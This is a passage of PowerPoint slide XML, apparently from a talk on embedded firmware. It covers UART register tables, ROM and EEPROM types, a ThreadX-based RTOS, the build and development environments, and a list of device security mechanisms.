                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>LCR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>MCR (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>9</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>LSR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>MSR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>11</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>SCR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>12</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>RBR Base</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6324600" y="1219200"/>
          <a:ext cx="2667000" cy="4498974"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="457200"/>
                <a:gridCol w="2209800"/>
              </a:tblGrid>
              <a:tr h="368352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>Access</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="368352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>13</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>RBR Tail (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="640170">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>14 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>RBR Increment (WO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="368352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>15</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>RBR Timeout (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="368352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>16</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>THR Base (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="368352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>17</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>THR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Head (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="640170">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>18</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>THR Decrement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (WO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="368352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>19</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>THR Timeout (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="640170">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>20</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>ESR - Event Status Register</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> - RWC</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="368352">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>21</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>EER</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1066800"/>
          <a:ext cx="2667000" cy="371475"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2667000"/>
              </a:tblGrid>
              <a:tr h="371475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>UART Interface</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45798" marB="45798"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3657600" y="609600"/>
          <a:ext cx="5257800" cy="371475"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5257800"/>
              </a:tblGrid>
              <a:tr h="371475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>“Reverse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>UART” Interface</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45798" marB="45798"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35773236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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ROM (Read Only Memory)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>ROM is good for storing code and constants, assuming they are not changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Masked ROM – the ROM is hardwired, manufactured with its content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Cheap, especially in big quantities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Programmable ROM (PROM) – can be programmed once using a special “device programmer”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Erasable Programmable ROM (EPROM) – can be erased by exposing to a strong ultraviolet light (takes 10-45 minutes); limited erase cycles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3646728611"/>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Operating System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>RTOS – ThreadX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Low priority thread &amp; High priority thread for power management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rest of threads (~40) in medium priority with round-robin scheduling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File system, network stack, user management etc. – all internally developed services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293011266"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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Build environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple “executables” to provide modularity and flexibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ROM authenticates and loads first flash module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First module initializes memory and loads the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS loader loads rest of “executables” based on required functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each “executable” has its own memory mapping file, all generated by a high level “build process”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3364317010"/>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Development environments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows version of logic layers for debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RTL testing for critical ROM flows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FPGA for critical hardware flows on a project basis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most of development on older version of actual hardware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1197783731"/>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Security Mechanisms</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Ring protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signed code using public/private key cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Per-device key based on manufacturing fuses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encryption of sensitive data on flash device and external memory buses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network security protocols – TLS, Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>True Random Number Generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Audit logging capability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2841717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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>EEPROM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Electrically-Erasable Programmable ROM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to EPROM, but erase can be done electrically, i.e. by the firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not quite ROM any more…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Erase and rewrite can be done on a byte basis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
